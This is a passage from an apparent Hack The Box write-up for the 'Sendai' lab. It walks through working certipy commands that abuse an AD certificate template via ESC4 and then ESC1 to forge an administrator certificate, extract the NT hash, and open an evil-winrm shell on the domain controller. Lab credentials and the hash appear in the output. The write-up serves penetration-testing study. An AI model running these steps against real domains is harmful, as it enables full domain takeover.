Enroll : SENDAI.VL\Authenticated Users
Certificate Templates
0
Template Name : SendaiComputer
Display Name : SendaiComputer
Certificate Authorities : sendai-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-11T12:46:12+00:00
Template Last Modified : 2023-07-11T12:46:19+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SENDAI.VL\Domain Admins
SENDAI.VL\Domain Computers
SENDAI.VL\Enterprise Admins
Object Control Permissions
Owner : SENDAI.VL\Administrator
Full Control Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Owner Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Dacl Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Property Enroll : SENDAI.VL\Domain Admins
SENDAI.VL\Domain Computers
SENDAI.VL\Enterprise Admins
[+] User Enrollable Principals : SENDAI.VL\Domain Computers
SENDAI.VL\ca-operators
[+] User ACL Principals : SENDAI.VL\ca-operators
[!] Vulnerabilities
ESC4 : User has dangerous permissions.
The SendaiComputer template is vulnerable to ESC4 from this user.
Now let's exploit it step by step
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ certipy-ad template -u clifford.davey -p RFmoB2WplgE_3p -dc-ip 10.129.247.57 -template SendaiComputer -write-default-configuration -no-save
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'SendaiComputer'
[*] Replacing:
[*] nTSecurityDescriptor: b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00'
[*] flags: 66104
[*] pKIDefaultKeySpec: 2
[*] pKIKeyUsage: b'\x86\x00'
[*] pKIMaxIssuingDepth: -1
[*] pKICriticalExtensions: ['2.5.29.19', '2.5.29.15']
[*] pKIExpirationPeriod: b'\x00@9\x87.\xe1\xfe\xff'
[*] pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.2']
[*] pKIDefaultCSPs: ['2,Microsoft Base Cryptographic Provider v1.0', '1,Microsoft Enhanced Cryptographic Provider v1.0']
[*] msPKI-Enrollment-Flag: 0
[*] msPKI-Private-Key-Flag: 16
[*] msPKI-Certificate-Name-Flag: 1
[*] msPKI-Minimal-Key-Size: 2048
[*] msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.2']
Are you sure you want to apply these changes to 'SendaiComputer'? (y/N): y
[*] Successfully updated 'SendaiComputer'
If I run the same find -vulnerable scan again, this time it shows ESC1 as well:
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
ESC4 : User has dangerous permissions.
ESC1 says that the enrollee can provide any subject I want. Now I just request a certificate for the administrator:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ certipy-ad req -u clifford.davey -p RFmoB2WplgE_3p -dc-ip 10.129.247.57 -ca sendai-DC-CA -target DC.sendai.vl -template SendaiComputer -upn administrator@sendai.vl -sid S-1-5-21-3085872742-570972823-736764132-500
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 7
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sendai.vl'
[*] Certificate object SID is 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Then use the resulting .pfx to authenticate:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.247.57
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sendai.vl'
[*] SAN URL SID: 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Security Extension SID: 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Using principal: 'administrator@sendai.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a
Now we can get the reverse shell as administrator
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ evil-winrm -i DC.sendai.vl -u administrator -H cfb106feec8b89a3d98e14dcbe8d087a
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sendai\administrator
Description
Sendai is a medium-difficulty AD box: anonymous SMB and RID brute force reveal expired/weak accounts; resetting thomas.powell yields a domain foothold. BloodHound shows abuse paths to the MGTSVC$ GMSA for DC RCE, and ADCS misconfiguration plus clifford.davey’s CA-OPERATORS rights let an attacker forge an admin certificate (via Certipy ESC4/ESC1), extract the NT hash and WinRM to achieve full domain compromise.